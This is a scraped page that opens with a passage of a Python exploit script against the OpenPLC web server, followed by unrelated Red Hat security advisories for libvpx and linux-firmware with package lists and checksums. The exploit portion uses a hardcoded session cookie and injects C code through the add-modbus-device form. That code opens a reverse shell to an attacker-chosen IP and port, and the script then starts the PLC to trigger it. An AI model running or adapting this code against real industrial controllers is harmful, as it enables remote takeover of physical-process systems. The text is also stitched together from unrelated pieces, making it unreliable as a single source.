name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n"    upload_act = x.post(act_url, headers=act_headers, data=act_data)    time.sleep(2)def connection():    print('[+] add device...')    inject_url = host + "/add-modbus-device"    # inject_dash = host + "/dashboard"    inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"}    inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "/text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------169043028319378579443281515639", "Origin": host, "Connection": "close", "Referer": host + "/add-modbus-device", "Upgrade-Insecure-Requests": "1"}    inject_data = "-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_name\"\r\n\r\n122222222222222222222222222222222222211111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_protocol\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_id\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_ip\"\r\n\r\n#11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111                                # \"ladder.h\"\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n   \r\n    \r\n    \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n    int port = "+rev_port+";\r\n    struct sockaddr_in revsockaddr;\r\n\r\n    int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n    revsockaddr.sin_family = AF_INET;       \r\n    revsockaddr.sin_port = htons(port);\r\n    revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n    connect(sockt, (struct sockaddr *) &revsockaddr, \r\n    sizeof(revsockaddr));\r\n    dup2(sockt, 0);\r\n    dup2(sockt, 1);\r\n    dup2(sockt, 2);\r\n\r\n    char * const argv[] = {\"/bin/sh\", NULL};\r\n    execve(\"/bin/sh\", argv, NULL);\r\n\r\n    return 0;  \r\n    \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n"    inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data)    time.sleep(3)    # comp = x.get(compile_program)    # time.sleep(6)    # x.get(inject_dash)    # time.sleep(3)    # print('[+] Spawning Reverse Shell...')    start = x.get(run_plc_server)    time.sleep(1)    if start.status_code == 200:        print('[+] Reverse connection receveid!')         sys.exit(0)    else:        print('[+] Failed to receive connection :(')        sys.exit(0)auth()injection()connection()

OpenPLC WebServer 3 Denial Of Service

Red Hat Security Advisory 2023-5537-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5537-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5537  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
libvpx-1.7.0-10.el8_8.src.rpm

aarch64:  
libvpx-1.7.0-10.el8_8.aarch64.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_8.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.aarch64.rpm

ppc64le:  
libvpx-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.ppc64le.rpm

s390x:  
libvpx-1.7.0-10.el8_8.s390x.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_8.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.s390x.rpm

x86_64:  
libvpx-1.7.0-10.el8_8.i686.rpm  
libvpx-1.7.0-10.el8_8.x86_64.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_8.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_8.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64:  
libvpx-debuginfo-1.7.0-10.el8_8.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_8.aarch64.rpm  
libvpx-devel-1.7.0-10.el8_8.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.aarch64.rpm

ppc64le:  
libvpx-debuginfo-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-devel-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.ppc64le.rpm

s390x:  
libvpx-debuginfo-1.7.0-10.el8_8.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_8.s390x.rpm  
libvpx-devel-1.7.0-10.el8_8.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.s390x.rpm

x86_64:  
libvpx-debuginfo-1.7.0-10.el8_8.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_8.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_8.x86_64.rpm  
libvpx-devel-1.7.0-10.el8_8.i686.rpm  
libvpx-devel-1.7.0-10.el8_8.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvLAAoJENzjgjWX9erEahUP/iXQ79lCk5ytBlnyduTi88a5  
umXetrpR8WsbbGyqx/ouILHA34c1G7sUX5SU6mrIlLUfSXvO/67yNJVzf3O6kTqm  
O/gEkO7RooygyskVu5sTl98SkZ7xOIhg7k1mqa5Ucgojm8wGu8jpcg+pWftGG+aK  
veRYSwFpwL+uybJghiJvv9mPgN69oE1dnXTfS6KgstnF+irpLQ4iPp3PgfH3nma7  
grWqR7E3Z1Mg4Qi2zFmD8Mat4iHprSe7UfztmMipq5Hv2OsmUOMbdtGvwD0zYjfA  
CEB71SFp1OeqZLKz6Vm0y7fYMYwlP5rRUe9P0o/qrY7nU0/XgbDMGBJuYErV0w+M  
qQMXE2gV7+u6LTzrL5+W0n8C+3NKatkR+BG2KDOf9iGgFgf+ugcZ117yU8uLFcRi  
JG3lBb6Bft9QtUBHODtA5cKn/uoHQw4k60JvE3IG11+N6q2n5GJevTdfY664So8X  
RDnow0pI3xugoPUG0UK74AanZM95ShNicXd8v9j3o4Ha9zp1laUgHg+CGmi3IdDe  
EuL2HpBbXdQDg5yjzaM+IrKj2ICkCI5DStVirknKxd4dMBGGbl+4RjlXl0CIBcVg  
lRPZB6UsAc23yq4zdM8RAazbgUkUDOSmD4MiVpj18qjpNtEbYnpLpJ+Gl2Go+pB5  
d8Fd2GhuQt+tMhHThYdr  
=92bt  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5537-01

An update for linux-firmware is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2023-20593: A flaw was found in hw, in “Zen 2” CPUs. This issue may allow an attacker to access sensitive information under specific microarchitectural circumstances.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Quarkus

**Integration and Automation**

All Products

Issued:

2023-10-10

Updated:

2023-10-10

**RHSA-2023:5591 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Moderate: linux-firmware security update

**Type/Severity**

Security Advisory: Moderate

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for linux-firmware is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

The linux-firmware packages contain all of the firmware files that are required by various devices to operate.  

Security Fix(es):  

*   hw: amd: Cross-Process Information Leak (CVE-2023-20593)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat Enterprise Linux Server - AUS 8.2 x86\_64
*   Red Hat Enterprise Linux Server - TUS 8.2 x86\_64
*   Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.2 ppc64le
*   Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.2 x86\_64

**Fixes**

*   BZ - 2217845 - CVE-2023-20593 hw: amd: Cross-Process Information Leak

**Red Hat Enterprise Linux Server - AUS 8.2**

SRPM

linux-firmware-20191202-100.gite8a0f4c9.el8\_2.src.rpm

SHA-256: 1c1a3032419c55de3381d4582b3bcb7f58cb1dab1caf76904e0d010fc22c8edf

x86\_64

iwl100-firmware-39.31.5.1-100.el8\_2.1.noarch.rpm

SHA-256: 7eabaebd9b404d7355a4144f207042a7bb2bd58845d6db7a1e3938c2ff7e86cf

iwl1000-firmware-39.31.5.1-100.el8\_2.1.noarch.rpm

SHA-256: d5f5692874003caaddd045dc26ea697254f008268f47e3aa48252138d52050b5

iwl105-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: f64a93f246cffead27bc5cd4dd78dc8fb9b483e2f2debcff8154b24c475b04fc

iwl135-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: b08a180479651fc965a4a3cda0d0eb3f061f8db4eca6b421dd4066e82758797e

iwl2000-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: a4a146316efe976aafbde0d3ed070686fe75143f35acd3c1dbc7a7ef3707ed55

iwl2030-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: 1bb44c732671fbea2140e93a64f26d7d8e7683ad0d9eb56a040e633c2720817e

iwl3160-firmware-25.30.13.0-100.el8\_2.1.noarch.rpm

SHA-256: 65625c27d5e3cc10e899ea0e5f174370cf4d6c21d06c335925486f2774d9e958

iwl3945-firmware-15.32.2.9-100.el8\_2.1.noarch.rpm

SHA-256: 88dd7e01f783bea27b0b1b01780fe4eb700005bac784555a46c879ad15adfd24

iwl4965-firmware-228.61.2.24-100.el8\_2.1.noarch.rpm

SHA-256: 9c629613cd961c4a9ae2fa83f0a574ba29ead83bc78e5ba0e9bb6928d6606407

iwl5000-firmware-8.83.5.1\_1-100.el8\_2.1.noarch.rpm

SHA-256: f40da742b2bd32e3f1c9e294c8cb38900ac096e8a479046b9feaec0ceaa79da2

iwl5150-firmware-8.24.2.2-100.el8\_2.1.noarch.rpm

SHA-256: fdac2ee486cbbbdd77a507c7518b7642cd61ff995ae4c7678080fa56780600df

iwl6000-firmware-9.221.4.1-100.el8\_2.1.noarch.rpm

SHA-256: bbd02c73e7b8b4c8b78c481e3b65fb0313ac640801d6877c0f9cbf1ef16f3a41

iwl6000g2a-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: d155f2278b66119af1d537c77a507e1570bab7caa1abcbcb5d55a987943a1194

iwl6000g2b-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: 36ed577cd95328d4cd8456c5a08c70683ab326f9850b384bfeaa6db781b53833

iwl6050-firmware-41.28.5.1-100.el8\_2.1.noarch.rpm

SHA-256: 3b5c1313d3e4f0f0bf434e392cc1ca02d3fa805aa183c7fbb39db8eaf7edc89f

iwl7260-firmware-25.30.13.0-100.el8\_2.1.noarch.rpm

SHA-256: a86e391a7ceecee4214a2ab8a6d51e3da5e328a7dd62966ede2b82829b0bafd9

libertas-sd8686-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 4e92b88f3e81b7c2946c2bec0f6db1c95a26db7e0bb3ba8a2f3bb94316c71b75

libertas-sd8787-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 9a471fdca5f148474461c345c8a596d2a94ad057301cc5164cd4ad72b596ffb8

libertas-usb8388-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 659bbe0f09559d3d2cc0ae15523378ed36fed7b9731354df6340cd09f40ea691

libertas-usb8388-olpc-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 58a6c898ac01bb6b1191ccb4d2a6b3465095d6a5716ccc79e4481dd0144daf12

linux-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: e9e9d84a38ded3d6c192d70c8ccb1b2bcdcf1b67c17e9073d6ae5a7c6d5bd65f

**Red Hat Enterprise Linux Server - TUS 8.2**

SRPM

linux-firmware-20191202-100.gite8a0f4c9.el8\_2.src.rpm

SHA-256: 1c1a3032419c55de3381d4582b3bcb7f58cb1dab1caf76904e0d010fc22c8edf

x86\_64

iwl100-firmware-39.31.5.1-100.el8\_2.1.noarch.rpm

SHA-256: 7eabaebd9b404d7355a4144f207042a7bb2bd58845d6db7a1e3938c2ff7e86cf

iwl1000-firmware-39.31.5.1-100.el8\_2.1.noarch.rpm

SHA-256: d5f5692874003caaddd045dc26ea697254f008268f47e3aa48252138d52050b5

iwl105-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: f64a93f246cffead27bc5cd4dd78dc8fb9b483e2f2debcff8154b24c475b04fc

iwl135-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: b08a180479651fc965a4a3cda0d0eb3f061f8db4eca6b421dd4066e82758797e

iwl2000-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: a4a146316efe976aafbde0d3ed070686fe75143f35acd3c1dbc7a7ef3707ed55

iwl2030-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: 1bb44c732671fbea2140e93a64f26d7d8e7683ad0d9eb56a040e633c2720817e

iwl3160-firmware-25.30.13.0-100.el8\_2.1.noarch.rpm

SHA-256: 65625c27d5e3cc10e899ea0e5f174370cf4d6c21d06c335925486f2774d9e958

iwl3945-firmware-15.32.2.9-100.el8\_2.1.noarch.rpm

SHA-256: 88dd7e01f783bea27b0b1b01780fe4eb700005bac784555a46c879ad15adfd24

iwl4965-firmware-228.61.2.24-100.el8\_2.1.noarch.rpm

SHA-256: 9c629613cd961c4a9ae2fa83f0a574ba29ead83bc78e5ba0e9bb6928d6606407

iwl5000-firmware-8.83.5.1\_1-100.el8\_2.1.noarch.rpm

SHA-256: f40da742b2bd32e3f1c9e294c8cb38900ac096e8a479046b9feaec0ceaa79da2

iwl5150-firmware-8.24.2.2-100.el8\_2.1.noarch.rpm

SHA-256: fdac2ee486cbbbdd77a507c7518b7642cd61ff995ae4c7678080fa56780600df

iwl6000-firmware-9.221.4.1-100.el8\_2.1.noarch.rpm

SHA-256: bbd02c73e7b8b4c8b78c481e3b65fb0313ac640801d6877c0f9cbf1ef16f3a41

iwl6000g2a-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: d155f2278b66119af1d537c77a507e1570bab7caa1abcbcb5d55a987943a1194

iwl6000g2b-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: 36ed577cd95328d4cd8456c5a08c70683ab326f9850b384bfeaa6db781b53833

iwl6050-firmware-41.28.5.1-100.el8\_2.1.noarch.rpm

SHA-256: 3b5c1313d3e4f0f0bf434e392cc1ca02d3fa805aa183c7fbb39db8eaf7edc89f

iwl7260-firmware-25.30.13.0-100.el8\_2.1.noarch.rpm

SHA-256: a86e391a7ceecee4214a2ab8a6d51e3da5e328a7dd62966ede2b82829b0bafd9

libertas-sd8686-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 4e92b88f3e81b7c2946c2bec0f6db1c95a26db7e0bb3ba8a2f3bb94316c71b75

libertas-sd8787-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 9a471fdca5f148474461c345c8a596d2a94ad057301cc5164cd4ad72b596ffb8

libertas-usb8388-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 659bbe0f09559d3d2cc0ae15523378ed36fed7b9731354df6340cd09f40ea691

libertas-usb8388-olpc-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 58a6c898ac01bb6b1191ccb4d2a6b3465095d6a5716ccc79e4481dd0144daf12

linux-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: e9e9d84a38ded3d6c192d70c8ccb1b2bcdcf1b67c17e9073d6ae5a7c6d5bd65f

**Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.2**

SRPM

linux-firmware-20191202-100.gite8a0f4c9.el8\_2.src.rpm

SHA-256: 1c1a3032419c55de3381d4582b3bcb7f58cb1dab1caf76904e0d010fc22c8edf

ppc64le

iwl100-firmware-39.31.5.1-100.el8\_2.1.noarch.rpm

SHA-256: 7eabaebd9b404d7355a4144f207042a7bb2bd58845d6db7a1e3938c2ff7e86cf

iwl1000-firmware-39.31.5.1-100.el8\_2.1.noarch.rpm

SHA-256: d5f5692874003caaddd045dc26ea697254f008268f47e3aa48252138d52050b5

iwl105-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: f64a93f246cffead27bc5cd4dd78dc8fb9b483e2f2debcff8154b24c475b04fc

iwl135-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: b08a180479651fc965a4a3cda0d0eb3f061f8db4eca6b421dd4066e82758797e

iwl2000-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: a4a146316efe976aafbde0d3ed070686fe75143f35acd3c1dbc7a7ef3707ed55

iwl2030-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: 1bb44c732671fbea2140e93a64f26d7d8e7683ad0d9eb56a040e633c2720817e

iwl3160-firmware-25.30.13.0-100.el8\_2.1.noarch.rpm

SHA-256: 65625c27d5e3cc10e899ea0e5f174370cf4d6c21d06c335925486f2774d9e958

iwl3945-firmware-15.32.2.9-100.el8\_2.1.noarch.rpm

SHA-256: 88dd7e01f783bea27b0b1b01780fe4eb700005bac784555a46c879ad15adfd24

iwl4965-firmware-228.61.2.24-100.el8\_2.1.noarch.rpm

SHA-256: 9c629613cd961c4a9ae2fa83f0a574ba29ead83bc78e5ba0e9bb6928d6606407

iwl5000-firmware-8.83.5.1\_1-100.el8\_2.1.noarch.rpm

SHA-256: f40da742b2bd32e3f1c9e294c8cb38900ac096e8a479046b9feaec0ceaa79da2

iwl5150-firmware-8.24.2.2-100.el8\_2.1.noarch.rpm

SHA-256: fdac2ee486cbbbdd77a507c7518b7642cd61ff995ae4c7678080fa56780600df

iwl6000-firmware-9.221.4.1-100.el8\_2.1.noarch.rpm

SHA-256: bbd02c73e7b8b4c8b78c481e3b65fb0313ac640801d6877c0f9cbf1ef16f3a41

iwl6000g2a-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: d155f2278b66119af1d537c77a507e1570bab7caa1abcbcb5d55a987943a1194

iwl6000g2b-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: 36ed577cd95328d4cd8456c5a08c70683ab326f9850b384bfeaa6db781b53833

iwl6050-firmware-41.28.5.1-100.el8\_2.1.noarch.rpm

SHA-256: 3b5c1313d3e4f0f0bf434e392cc1ca02d3fa805aa183c7fbb39db8eaf7edc89f

iwl7260-firmware-25.30.13.0-100.el8\_2.1.noarch.rpm

SHA-256: a86e391a7ceecee4214a2ab8a6d51e3da5e328a7dd62966ede2b82829b0bafd9

libertas-sd8686-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 4e92b88f3e81b7c2946c2bec0f6db1c95a26db7e0bb3ba8a2f3bb94316c71b75

libertas-sd8787-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 9a471fdca5f148474461c345c8a596d2a94ad057301cc5164cd4ad72b596ffb8

libertas-usb8388-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 659bbe0f09559d3d2cc0ae15523378ed36fed7b9731354df6340cd09f40ea691

libertas-usb8388-olpc-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: 58a6c898ac01bb6b1191ccb4d2a6b3465095d6a5716ccc79e4481dd0144daf12

linux-firmware-20191202-100.gite8a0f4c9.el8\_2.noarch.rpm

SHA-256: e9e9d84a38ded3d6c192d70c8ccb1b2bcdcf1b67c17e9073d6ae5a7c6d5bd65f

**Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.2**

SRPM

linux-firmware-20191202-100.gite8a0f4c9.el8\_2.src.rpm

SHA-256: 1c1a3032419c55de3381d4582b3bcb7f58cb1dab1caf76904e0d010fc22c8edf

x86\_64

iwl100-firmware-39.31.5.1-100.el8\_2.1.noarch.rpm

SHA-256: 7eabaebd9b404d7355a4144f207042a7bb2bd58845d6db7a1e3938c2ff7e86cf

iwl1000-firmware-39.31.5.1-100.el8\_2.1.noarch.rpm

SHA-256: d5f5692874003caaddd045dc26ea697254f008268f47e3aa48252138d52050b5

iwl105-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: f64a93f246cffead27bc5cd4dd78dc8fb9b483e2f2debcff8154b24c475b04fc

iwl135-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: b08a180479651fc965a4a3cda0d0eb3f061f8db4eca6b421dd4066e82758797e

iwl2000-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: a4a146316efe976aafbde0d3ed070686fe75143f35acd3c1dbc7a7ef3707ed55

iwl2030-firmware-18.168.6.1-100.el8\_2.1.noarch.rpm

SHA-256: 1bb44c732671fbea2140e93a64f26d7d8e7683ad0d9eb56a040e633c2720817e

iwl3160-firmware-25.30.13.0-100.el8\_2.1.noarch.rpm

